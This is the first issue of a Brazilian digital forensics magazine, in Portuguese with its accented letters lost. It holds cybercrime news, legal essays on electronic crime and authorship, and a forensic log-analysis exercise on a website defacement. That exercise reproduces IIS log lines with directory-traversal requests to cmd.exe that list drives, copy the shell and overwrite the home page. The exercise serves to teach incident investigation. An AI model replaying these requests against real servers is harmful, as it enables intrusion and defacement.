EVIDNCIA DIGITAL

Percia Forense Aplicada Informtica aaaa JAN/FEV/MAR

2004 NMERO 01 ANO I

IDENTIFICAO DA AUTORIA
A questo da identificao da autoria das condutas efetuadas no meio eletrnico

SUMRIO
Contextualizao da prtica forense Pg 05 Crimes eletrnicos Pg 06 Teste seus conhecimentos Pg 08 Identificao da autoria Pg 11 Descubra o que h dentro de um documento do Word Pg 14 Imperfection in the system Pg 17 Percia em disquete Pg 19

CONTEXTUALIZAO DA PRTICA FORENSE

TESTE SEUS CONHECIMENTOS

Teste seus conhecimentos ao analisar um arquivo de Log

Contextualizao da prtica investigativa dentro de um s istema de gesto de segurana

CRIMES ELETRNICOS
Os crimes eletrnicos exigem uma soluo rpida e especializada

GRUPO DE DISCUSSO
Venha fazer parte voc tambm do nico grupo de discusso em portugus sobre Percia Forense Aplicada Informtica

DESCUBRA O QUE H DENTRO DE UM DOCUMENTO DO MICROSOFT WORD

Realizamos uma Percia em um documento do Word e veja qual foi o resultado

E MAIS...

Editorial, Notcias, Links

"N o b a s t a e s t a r c e rt o , pre c i s o pro va r"

Editor Chefe Andrey R. Freitas

DITORIAL
Os grupos de usurios no so novidade hoje em dia, mas nos ltimos meses tem havido grande interesse por esse tipo de iniciativa. O objetivo dos membros dos grupos trocar experincia, relatos e informaes sobre o uso de uma determinada tecnologia.

Editor Tcnico Andrey R. Freitas

Sempre que surge algo novo, muitas pessoas demonstram interesse em conhecer o assunto em mais detalhes. Encontrar outros interessados pode ser o primeiro passo para formar um novo grupo.

Colaboradores desta edio Andrey R. Freitas Carolina Chaves Daniel A. Rosa Juliana C. Abrusio Leonildo Junior Renato O. Blum

A primeira parte j foi concluda, a inaugurao do grupo de discusso Percia Forense Aplicada Informtica h mais de 6 meses e agora inauguramos a segunda etapa, a criao da Revista Evidncia Digital.

Artigos Se voc deseja escrever artigos para a Revista Evidncia Digital envie um e-mail para periciaforense@yahoo.com.br

Aproveito para agradecer as pessoas que acreditaram no projeto e as que colaboraram para a criao desta primeira edio.

Atendimento ao leitor periciaforense@yahoo.com.br

Site www.guiatecnico.com.br/evidenciadigital

Andrey Rodrigues de Freitas

Criador / Moderador do grupo Percia Forense Aplicada Informtica

Grupo de discusso br.groups.yahoo.com/group/PericiaForense/

A revista Evidncia Digital uma publicao trimestral.

O contedo dos artigos de responsabilidade dos autores.

Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

OTCIAS
Delegacia do RJ comea a ganhar infoguerra Fonte: IDG Now! A Delegacia de Represso aos Crimes de Informtica (DRCI) do Rio de Janeiro est ganhando a guerra contra os e-mails falsos, que levam a sites tambm falsos, onde usurios de internet que caem neste infogolpe deixam informaes pessoais, como senhas bancrias e dados do carto crdito. De um total de 14 denncias que a delegacia recebeu nos ltimos tempos, conseguiu retirar no ar 86% dos casos, de forma rpida. A estratgia utilizada pela delegada titular da DRCI, Beatriz Senda, e sua equipe, como o inspetor Mrcio Arajo, mantida em segredo, por estratgia de segurana. Arajo, no entanto, informa que, dos 14 casos, sete dos sites estavam hospedados em provedores do Japo, cinco da Coria e um da Tailndia. Um dos casos ainda mantido em sigilo, pelos mesmos motivos de segurana. Os provedores do Japo, da Coria, de Taiwan e dos Estados Unidos tem sido os mais procurados pelo brao informatizado do crime para hospedar esses sites, diz Arajo. Com a cooperao do Yahoo! (dono do Geocities) e de outros provedores, conta o SecurityFocus, a polcia descobriu que Helen tinha ligaes com um spammer profissional e com George Patterson, um ladro de cartes de crdito na web que foi condenado em julho a 37 meses de priso. Foram os dois que denunciaram a mulher, que vive em Ohio.

BC quer ajuda da Polcia Federal para rastrear e-mails falsos Fonte: IDG Now! O Banco Central vai recorrer Polcia Federal para rastrear os responsveis por e -mails falsos que estariam sendo enviados por outras pessoas em nome da instituio. De acordo com a autoridade monetria, internautas malintencionados estariam enviando e-mails a empresas exportadoras e importadoras com pedidos de informaes confidenciais referentes s transaes das mesmas com o exterior. "Estas mensagens so falsas e no devem ser respondidas pelos destinatrios sob hiptese alguma", refora um alerta distribudo pelo banco. Segundo o BC, esse tipo de solicitao feito por mecanismos seguros de transmisso de dados.

Scammer pega 46 meses de priso Fonte: Planto INFO A americana Helen Carr, de 55 anos, foi condenada na semana passada a 46 meses de priso pelo envio de phishing scams para os assinantes da America Online. Os falsos e-mails chegavam para os usurios como se fossem comunicados importantes do departamento de segurana da AOL. A inteno era obter o nmero do carto de crdito das vtimas. Helen declarou-se culpada na primeira audincia, em outubro passado, conta o SecurityFocus.com. Os phishing scams diziam para a vtima que a comunicao com a administradora do carto de crdito, para a cobrana da mensalidade, havia falhado. Por isso, o assinante deveria inserir seus dados novamente no "Centro de Cobrana da AOL" - um site falso, obviamente. At o limite do carto de crdito era pedido pelo formulrio fraudulento. O azar da scammer foi que, em fevereiro de 2001, sua mensagem foi parar nas mos de um agente do FBI - e, mais que isso, um especialista em crimes de computador. O agente, Joseph Yuhasz, no precisou muito para desconfiar do endereo de resposta ao e-mail (precious44257166@aol.com) e do suposto site de cobrana, hospedado no servio gratuito do Geocities.

Aumenta ndice de roubo de identidade na web Fonte: Planto INFO As fraudes online foram um dos principais motivos de reclamao dos consumidores americanos em 2003. O roubo de identidade, principalmente atravs de scam, correspondeu a 42% das reclamaes registradas no ano passado. Um ndice 2% maior que o registrado em 2002. As informaes esto no relatrio anual divulgado pelo Federal Trade Commission. Ao todo foram relatadas 516 740 reclamaes. Os campees da lista foram os leiles online (15%), as vendas em domiclio por catlogo (9%) e os servi os de internet (6%). Segundo o levantamento, as perdas dos consumidores americanos em servios de internet chegaram a 200 milhes de dlares em 2003, o equivalente a 195 dlares por vtima.

Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

Falha no Word causa embarao Microsoft Fonte: IDG Now! Uma falha no processador de texto Word, da Microsoft, transforma a maioria das caractersticas de segurana do software em suprfluas. A opo "Proteger Documento" da opo "Ferramenta" usada quando um usurio quer impedir que pessoas no autorizadas mudem determinadas reas de um documento. O recurso permite que o usurio anexe uma senha ao arquivo e, dessa forma, restrinja as alteraes de dados nas pginas. Uma quantidade muito grande de empresas usam esse recurso para enviar cotaes e notas fiscais. O CIO da Infineon Technologies AG, Thorsten Delbrouck, descobriu, no entanto, que o documento "protegido" pode ser aberto, alterado e at mesmo ganhar uma nova senha (ou a original, assim ningum poderia duvidar da autenticidade). A Microsoft, por meio de seu Web site, diz que o recurso de senha menos seguro do que outras caractersticas, tais como aquelas que permitem ao usurio proteger o documento completo com senhas.

Para elaborar o texto sugerido da lei, foram realizados vrios debates, inclusive online, entre polticos, peritos e demais especialistas. Ironicamente, em vrios desses debates houve invases de hackers, que se fizeram passar por participantes. "Chegamos a identificar alguns dos invasores, mas no podamos fazer nada no momento justamente por no haver amparo legal. Afinal, no existe crime sem lei", conta Piauhylino. O deputado considera ser evidente o fato de que a ausncia de uma lei especfica serve de estmulo para que os crimes continuem. Com o projeto aprovado, hackers e outros criminosos eletrnicos devero migrar para outros pases que no tenham legislao. "E a ocorrncia de crimes digitais poder diminuir em torno de 50%", avalia o parlamentar. As penas previstas para os delitos variam de um ms a cinco anos de deteno. Mais especificamente, a proposta estabelece punio para quem coletar, processar e distribuir, com finalidades comerciais, informaes privadas. E garante a qualquer pessoa, fsica ou jurdica, o direito de interpelar judicialmente o proprietrio de rede de computadores ou provedor de servio. Pune ainda quem apagar, modificar ou de qualquer forma inutilizar total ou parcialmente um dado ou programa de computador. O projeto conta com parecer favorvel do relator, o deputado Nelson Pellegrino (BA), lder do PT na Cmara e que, inclusive, foi o responsvel por acrescentar o crime de clonagem de celular a cartes no projeto.

No h crime sem lei Fonte: IT Web Projeto de lei que define o que crime dentro das novas tecnologias aprovado por unanimidade no Plenrio do Congresso e pode sair do papel em breve Manipular dados sem permisso, obter acesso indevido ao meio eletrnico ou sistema informatizado, introduzir vrus em computadores, clonar celular e falsificar carto de crdito; todos esses atos so, obviamente, criminosos, s que ainda no h lei brasileira que os considere como tais. Mas talvez essa histria mude em breve, ainda no comeo deste ano, de acordo com a expectativa do deputado Luiz Piauhylino (PSDB-PE), autor de um projeto de lei, aprovado h pouco pelo Plenrio que classifica os crimes cometidos na rea de informtica. "Falta o projeto passar pelo crivo do Senado e ser sancionado pelo presidente da Repblica. Mas como se trata de um assunto urgente, que sofre presso pela sociedade e tem o apoio unnime de todos os partidos da Cmara, acredito que essas etapas no demorem muito", diz o deputado. O projeto de lei, que visa a acrescentar uma nova Seo ao Cdigo Penal, a terceira tentativa de criar uma lei que defina o que crime dentro das novas tecnologias informticas, em especial a internet. Se o projeto for aprovado, o Brasil ser um dos poucos pases a possuir legislao adequada para incriminar condutas do gnero.

Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

ONTEXTUALIZAO DA PRTICA FORENSE

Daniel Accioly Rosa Muito se tem comentado sobre prticas de investigao forense em ambientes tecnolgicos e sua importncia. A identificao dos responsveis pelos problemas e crimes, assim como a oportunidade de se entender o mecanismo dos ataques tem motivado diversos bons profissionais a se dedicarem ao estudo do assunto, assim como ao desenvolvimento de metodologias para uma abordagem adequada da questo. O grande ponto ainda no discutido a contextualizao da prtica investigativa dentro de um Sistema de Gesto de Segurana. Se formos analisar as metodologias existentes para se implementar segurana em uma rea, seja ela num contexto empresarial ou militar, podemos observar a existncia de ciclos de aprendizado, ou seja, se prope um sistema que se auto-alimente, possibilitando sua melhora contnua e manuteno de nveis de segurana compatveis com um ambiente em constante mutao. Um exemplo claro desta afirmao a BS7799-2, que especifica um Sistema de Gesto de Segurana, ou ISMS (Information Security Management System) para garantir que todos os controles registrados no documento Statement of Applicability estejam de acordo com a realidade do escopo em questo. Este sistema deve seguir a mxima PDCA, ou Plan-DoCheck-Act, que a orientao da metodologia para um sistema cclico e que se auto-alimenta.

BS7799-2: Modelo de Processo PDCA Dentro deste contexto, entender a importncia da prtica investigativa se torna fcil. Muito mais importante que se repreender os culpados ou buscar uma compensao litigiosa de um Evento de Segurana, o aprendizado com o problema deve ser a meta dos trabalhos forenses aplicados Segurana da Informao. Se conduzidos da forma correta, estes trabalhos iro permitir uma compreenso de quais controles esto implementados de maneira inadequada, ou at apontar a inexistncia de outros controles necessrios. Estes dados devem sempre estar ligados a um contexto maior que possa, junto com informaes de auditorias, testes de intruso, registros de operao, entre outros indicativos de
Daniel Accioly Rosa (daniel.accioly@terra.com.br)
Graduado em Engenharia Eletrnica, ps-graduado em Internet Security (Advanced School of Internet Security), CISSP, CCSE, RSA CSP e MCP.

monitorao de parmetros de eficincia do Sistema de Segurana implementado, possibilitar uma viso clara de onde se deve investir. A existncia de um sistema forense e a execuo de prticas investigativas nos eventos de segurana so de suma importncia para se ter um sistema alinhado com a realidade do ambiente que o circunda. extremamente crtico cruzar os dados deste sistema com informaes de outras fontes de monitoramento de segurana para se ter uma viso abrangente de onde necessrio investir. Se fizermos isso, fica fcil justificar para o chefe o investimento naquela ferramenta de anlise que tanto estamos precisando

Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

RIM ES ELETRNICOS
Renato O. Blum e Juliana C. Abrusio

Os meios eletrnicos, sobretudo a Internet, possibilitam a prtica de crimes complexos e que exigem uma soluo rpida e especializada. O avano tecnolgico tem proporcionado o incremento dos crimes comuns, de tal forma que podemos afirmar, sem sombra de dvida, que os delitos virtuais crescem na proporo do avano da tecnologia. De fato, o sentimento de anonimato (ainda que haja a vedao Constitucional), a impunidade e o alcance global dos meios de comunicao fazem com que o nmero de infratores dessa natureza cresa, no obstante a constante preocupao em inibir tais condutas. Cumpre ressaltar que a legislao vigente aplicada aos crimes praticados no meio fsico, pode ser utilizada com perfeio, outrossim, para os delitos informticos, ou para aqueles crimes que de alguma forma, utilizaram o ambiente virtual. Com efeito, os Cdigos Brasileiros j esto sendo discutidos em crimes comuns praticados por meio eletrnico. De outro lado, contudo, restam as condutas que surgiram apenas com a disseminao de ferramentas de alta tecnologia. o caso dos crackers, chamados equivocadamente de hackers, especialistas em invadir sistemas informticos e bancos de dados, sempre com o intuito de causar prejuzo (concorrncia desleal, dano, violao de direito autoral e outras condutas). As estatsticas revelam que o Brasil o Pas com o maior nmero de crackers especialistas no mundo. Todavia, ainda que a Lei brasileira venha sendo aplicada na prtica, no podemos deixar de lado a recomendao de legislao complementar sobre o assunto (como se destaca o Projeto 84/99), com intuito de prover maior celeridade processual e a efetiva represso aos delitos eletrnicos. Necessria, tambm, a celebrao de tratados internacionais que cobam as condutas criminosas no ambiente da Internet (como, p. ex. a excelente Conveno de Budapeste de 2001, tambm conhecida como Conveno sobre o Cybercrime), bem como uma poltica mundial para cooperao recproca, dada a questo que envolve a extraterritorialidade desses crimes. Mesmo assim, merece destaque, no plano nacional, a lei n 9.296, de 24 de Junho de 1996, que lei pune o indivduo que realizar interceptao de comunicaes em sistemas de informtica ou telemtica, ato tpico da

comunidade cracker, desde que se obtenha prova eletrnica adequada. A reprimenda de recluso, de dois a quatro anos, e multa. Acrescente-se, pois, que a evidncia eletrnica apresenta caractersticas prprias e complexas, exigindo conhecimento especializado na sua coleta e utilizao. Alm disso, da natureza do prprio meio a volatilidade e fragilidade que, curiosamente, se entrelaam com a facilidade da recuperao de rastros e outros indcios tpicos. Em suma, de grande importncia a preocupao global, bem como a ateno nacional despendida ao assunto. No obstante a esta preocupao, verifica-se que as leis brasileiras vigentes podem e j esto sendo aplicadas aos crimes praticados no ambiente virtual, a exemplo da pedofilia, das fraudes em instituies financeiras, dos crimes contra a honra, dos crimes contra a propriedade industrial e intelectual e etc, os quais, inclusive, possibilitam vtima o recebimento de indenizaes pelo prejuzo material ou moral sofrido. Basta, neste momento, que as vtimas exeram o direito de buscar aquilo que devido. Agindo dessa forma, ainda que por via indireta, teremos, com certeza, diminuio na impunidade e aumento no exerccio da cidadania.

RENATO M. S. OPICE BLUM (blum@amcham.com.br)

Advogado e economista; Professor coordenador de ps-graduao em Direito Eletrnico; Professor da Florida Christian University, Fundao Getlio Vargas, PUC, Centro Tcnico Aeroespacial, Fenasoft e outras; Ps-graduado pela PUC-SP, com extenso na Eastern Illinois University; MBA Essentials in Economics (University of Pittsburgh); Fundador e Conselheiro do Instituto Brasileiro de Poltica e Direito da Informtica (IBDI); Presidente do Conselho de Comercio Eletrnico da Federao do Comrcio do Estado de So Paulo; Ex -Presidente e Fundador do Comit de Direito da Tecnologia da Cmara Americana de Comrcio; Autor / Colaborador das Obras: "Direito Eletrnico - a Internet e os Tribunais", "Comrcio Eletrnico", "Direito & Internet aspectos jurdicos relevantes", "Direito da Informtica - temas polmicos", "Responsabilidade Civil do Fabricante e Intermedirios por Defeitos de Equipamentos e Programas de Informtica", "O Bug do Ano 2000 - aspectos jurdicos e econmicos" e outras.

JULIANA CANHA ABRUSIO

Advogada, scia da Opice Blum Advogados Associados; Professora da Universidade Presbiteriana Mackenzie, na disciplina Direito nos Meios Eletrnicos; Palestrante convidada pelo I Congresso da Comunidade Andina para o Desenvolvimento do Comrcio Eletrnico realizado na Bolvia (2001); Membro da Comisso de Novos Advogados do Instituto de Advogados de So Paulo (IASP); Membro da Associao Brasileira de Direito de Informtica e Telecomunicaes (ABDI); Co-autora do Caderno Jurdico Direito e Internet publicado pela Escola Superior do Ministrio Pblico (2002); Autora das Monografias "Aspectos Jurdicos do Comrcio Eletrnico" e "Contratos Eletrnicos e a Assinatura Digital" (2.000).

Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

RUPO DE DISCUSSO Venha fazer parte voc tambm do nico grupo de discusso em portugus sobre Percia Forense Aplicada Informtica
Contando com as principais autoridades brasileiras em Percia Digital e Cyber Crimes, o grupo Percia Forense Aplicada Informtica cobre os seguintes itens: Anlise de Invaso em Sistemas, Anlise de Arquivos de Logs, Ferramentas (Software/Hardware) Utilizadas na Percia, Cursos, Livros, Documentos, Cyber Crimes/Delitos Informticos/Computer Crimes, Estudos de Caso, Testes de Conhecimentos, Etc...

http://br.groups.yahoo.com/group/PericiaForense/

Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

ESTE SEUS CONHECIM ENTOS

Andrey Rodrigues de Freitas

O exemplo apresentado neste artigo um simples defacement de um web site de comrcio eletrnico. O alvo do ataque foi um servidor web administrado por vrias pessoas. Complexidade do Ataque : Baixa Alvo : Servidor Web com Microsoft IIS/NT4 Quarta-feira, 27 de Maro de 2003, 21:00 Eram 21:00 de uma quarta-feira noite, toca o telefone no departamento de suporte tcnico. A ligao e de ra um usurio declarando que o web site da empresa havia sido hackeado, alterado, desfigurado! Marcos, o atendente, verifica a informao e acaba descobrindo que o site realmente havia sido hackeado, alis, no havia mais site, apenas a seguinte mensagem na pgina principal: **** SCRIPT KIDZ, INC**** You, my friendz, are completely owned. I'm here, your security is nowhere. Someone should check your system security coz you sure aren't. Marcos no sabia ao certo o que fazer. Entrou em pnico e apavorado comeou a procurar a lista de telefones dos funcionrios do departamento de informtica, tentando conseguir algum que o ajudasse, por sorte encontra um estagirio que estava "trabalhando" naquela noite. Marcos comunicou a situao ao estagirio, que na sua vez, tambm ficou desesperado. No sabendo o que fazer, o estagirio contactou seu superior imediato. Depois de ouvir o acontecimento, o superior disse ao estagirio para arrumar as pginas alteradas pelo atacante e mover o sistema hackeado para a DMZ. Quinta-feira, 28 de Maro de 2003, 09:00 Naquela quinta-feira, a situao conseguiu ficar ainda pior. Outros funcionrios da empresa acompanhando uma das listas de discusso existentes na Internet, recebem uma mensagem que deveria ser sobre supostos investimentos na companhia. Na verdade algum postou um link para a cpia arquivada do web site hackeado da empresa junto com uma mensagem maliciosa zombando sua segurana, devido a este incidente, as aes da empresa caram.

Segunda-feira, 31 de Maro de 2003, 13:00 O pessoal da informtica comea a pesquisar o ataque. O servidor Web que foi atacado acabou sendo atualizado por um cpia mais antiga, e ningum notou por vrias horas que o site estava com a verso anterior on-line. Os logs do sistema hackeado no apresentaram nenhuma evidncia de um ataque, e o log de eventos do NT no tinha quaisquer entradas durante os dias anteriores ou durante o ataque. O que pareceu suspeito foram as 22 entradas no arquivo de log do servidor Web relacionadas abaixo:

Quinta-feira, 28 de Maro de 2003, 00:15 O estagirio resolve colocar as coisas de volta ao normal, achando que o atacante era do tipo que fazia backups de todos os arquivos que alterava. Depois de copiar os arquivos originais de volta para o seu local correto e reiniciar o servidor Microsoft IS, o estagirio muda a mquina para a DMZ.

Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

27/03/2003 4:01 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c:\ 200 730 484 31 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 27/03/2003 4:01 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+d:\ 200 747 484 31 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 27/03/2003 4:02 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+e:\ 502 381 484 47 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 27/03/2003 4:02 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c:\ 200 730 484 31 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 27/03/2003 4:02 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c:\asfroot\ 200 666 492 47 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 27/03/2003 4:02 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c:\inetpub\ 200 749 492 32 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 27/03/2003 4:02 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c:\inetpub\wwwroot 200 1124 499 47 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 27/03/2003 4:02 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /mmc.gif - 404 3387 440 0 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 27/03/2003 4:02 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /mmc.gif - 404 3387 439 0 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 27/03/2003 4:02 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+d:\ 200 747 484 16 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 27/03/2003 4:03 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+d:\wwwroot\.com 200 229 496 32 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 27/03/2003 4:03 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+d:\wwwroot\ 200 4113 492 47 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 27/03/2003 4:03 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /buzzxyz.html - 200 228 444 16 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 27/03/2003 4:03 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /xyzBuzz3.swf - 200 245 324 5141 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 27/03/2003 4:03 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /index.html - 200 228 484 0 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) http://www.vitima.com/buzzxyz.html 27/03/2003 4:05 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+rename+d:\wwwroot\detour.html+detour.html.old 502 355 522 31 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 27/03/2003 4:05 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+md+c:\ArA\ 502 355 488 31 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 27/03/2003 4:05 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.Exe+c:\ArA\cmd1.exe 502 382 524 125 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 27/03/2003 4:07 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /scripts/../../ArA/cmd1.exe /c+echo+"<title>SKI</title><center><H1><b><u>****</u>SCRIPT+KIDZ, INC<u>****</u></h1><br><h2>You,+my+friendz+,are+completely+owned.+I'm+here,+your+security+is+nowhere.<

Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

br>Someone+should+check+your+system+security+coz+you+sure+aren't.<br></h2>"+>+c:\ArA\default.htm 502 355 763 31 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 27/03/2003 4:08 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /scripts/../../ArA/cmd1.exe /c+rename+d:\wwwroot\index.html+index.html.old 502 355 511 16 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 27/03/2003 4:10 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /scripts/../../ArA/cmd1.exe /c+copy+c:\ArA\default.htm+d:\wwwroot\index.html 502 382 514 31 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 27/03/2003 4:11 nihon.hacker.jp W3SVC1 WWW-2K WWW-2K.vitima.com 80 GET /index.html - 200 276 414 15 www.vitima.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)

PERGUNTAS Ao analisar as 22 entradas do arquivo de log, voc dever ser capaz de determinar o seguinte: 1. Que vulnerabilidade fez o atacante explorar e comprometer o servidor Web? 2. O que o atacante fez para tentar ofuscar seus rastros? Obs: Discuta estas e outras informaes no Grupo de Discusso "Percia Forense Aplicada Informtica".

Andrey Rodrigues de Freitas (periciaforense@yahoo.com.br)

Graduado em Processamento de Dados, ps-graduado em Computao Aplicada e ps-graduado em Internet Security (Advanced School of Internet Security). Criador / moderador do Grupo Percia Forense Aplicada Informtica.

EVIDNCIA DIGITAL
Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

10

DENTIFICAO DA AUTORIA
Carolina Chaves

A questo da identificao da autoria das condutas efetuadas no meio eletrnico, especialmente quanto aos crimes, motivo de grande preocupao para os especialistas em novas tecnologias. Diante do crescimento do nmero de litgios, especialmente relacionados propriedade intelectual, honra e ao patrimnio, juzes, advogados, sites, provedores e usurios esto cada vez mais envolvidos na busca de uma soluo rpida, eficaz e economicamente vivel para a determinao da autoria. No se tem aqui a pretenso de esgotar o tema ou mesmo apontar uma soluo para a controvrsia mas alertar a comunidade sobre as situaes que cada vez mais estaro presentes no cotidiano dos operadores do direito, assim como mostrar o material utilizado pelos especialistas, sem se ater a condutas especficas, buscando uma viso geral do problema. O anonimato Inicialmente, importante demonstrar que o incio das condutas socialmente reprovveis vem da sensao de anonimato e de impunidade da grande massa de usurios da Internet. Apesar da Internet ser um local em que transitam milhares de pessoas espalhadas nos diversos locais do planeta, que circulam e interagem fazendo desta um ambiente a -nacional ou transnacional, existe uma ntida contradio na sua estrutura. Trata-se da pontualidade das relaes, o one to one, que enseja a sensao de anonimato ao usurio comum e que, muitas vezes, geram atitudes que as pessoas no tomariam diante de olhos alheios. a sensao de estar escondido atrs da tela do computador. Entretanto, pressupor que a Internet um local onde vigora o anonimato um grande erro. A rastreabilidade das condutas efetuadas no meio eletrnico absolutamente possvel. Foi o que ocorreu em janeiro deste ano com Pete Townshend, lder da banda The Who, que foi preso pela polcia londrina por ter acessado sites de pedofilia. No h dvidas de que o msico foi motivado pelo sentimento de anonimato e pela curiosidade, passando a visitar sites de contedo ilcito e socialmente reprovvel na expectativa de que ningum saberia ou descobriria.

Neste sentido, o sentir-se protegido" invoca um sentimento de impunidade, por no se acreditar que qualquer conduta lesiva praticada pelo computador, poder ensejar responsabilidades. E, no h como negar que, havendo possibilidade de rastrear os movimentos dos usurios, conforme demonstraremos a seguir, existe responsabilidade na Internet, civil e criminal, e que ela poder ser requerida desde que se comprove o dano, a conduta do autor e seu nexo de causalidade. Deve-se, portanto, alertar o usurio comum, leigo ou com poucos conhecimentos de informtica, sobre suas responsabilidades, contribuindo para uma poltica preventiva que se destine a evitar determinadas condutas socialmente lesivas. A maior dificuldade no combate s condutas no meio eletrnico quando estas so praticadas por grandes profissionais. Estes costumam no deixar vestgios, utilizando-se de artimanhas a fim de enganar a polcia e dificultar a atuao dos peritos na sua identificao. Um especialista, por exemplo, jamais mandaria e-mail de contedo calunioso ou acessaria um site com contedo lesivo de seu prprio computador. Logo, polticas de combate aos especialistas so extremamente complexas e difceis de serem implementadas. O problema da identificao O problema da identificao da autoria, para fins de responsabilizao, civil ou criminal, se pauta em alguns aspectos fundamentais: a) As informaes utilizadas para identificao da autoria b) Interpretao e a coleta das informaes c) Obstculos no acesso s informaes d) Detentores das informaes Os criminosos na Internet, os chamados crackers esto cada vez mais atualizados em novas tecnologias, o que dificulta a preveno das empresas nas polticas de segurana da informao e dos sistemas computacionais. E no restam dvidas, de que nos prximos anos os atos criminosos, em sua maioria, sero praticados pelo computador. a) As informaes utilizadas para identificao da autoria - Os dados identificadores

Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

11

A Identificao possvel e j muito praticada. Utilizase de elementos peculiares ao meio eletrnico que possibilitam a individualizao do usurio ou da mquina. So utilizados o nmero IP (Internet Protocol), o registro de logs de acesso, a conta do e-mail e seus dados cadastrais e senhas ou cadastros nos provedores e sites. Assim, com este material possvel identificar a mquina, o usurio, o tempo de acesso, os locais visitados e o perfil da visita. Entretanto, esta identificao traz um grande problema: encontrar a mquina, o responsvel pela conta de email ou o responsvel por um determinado site no significa que se identificou o autor do fato ou da conduta que ensejou uma investigao para eventual responsabilizao. As senhas podem ser violadas, o computador pode ter sido utilizado por pessoa no pertencente ao sistema, remotamente ou no, e outras situaes. O nico mtodo que garante a autenticidade, ou seja, que proporciona a certeza da autoria a assinatura digital, em que h o no-repdio nos casos das assinaturas emitidas por autoridades homologadas pela ICP-Brasil, e poder tranqilamente ser utilizado como prova da autoria, num processo que tramita no judicirio brasileiro. b) Interpretao e a coleta das informaes A anlise dos dados identificadores depende de trabalho especializado para a coleta e interpretao das informaes. Ocorre que, alm de especialistas em tecnologia da informao e peritos em telemtica, h necessidade de profissionais que compreendam os termos tcnicos e saibam utiliz-los na defesa ou na acusao. Assim, existe a dificuldade de se saber quais dados coletados so importantes ou dispensveis para comprovao do fato e de sua autoria e que possa ensejar ingresso de ao na esfera criminal e cvel. c) Obstculos no acesso s informaes o sigilo e a privacidade das informaes O acesso e a utilizao de dados, especialmente na fase de investigao, apresenta uma questo fundamental: estes so sigilosos? Podem ser fornecidos mediante notificao? Somente uma legislao poder resolver esta questo, especialmente no 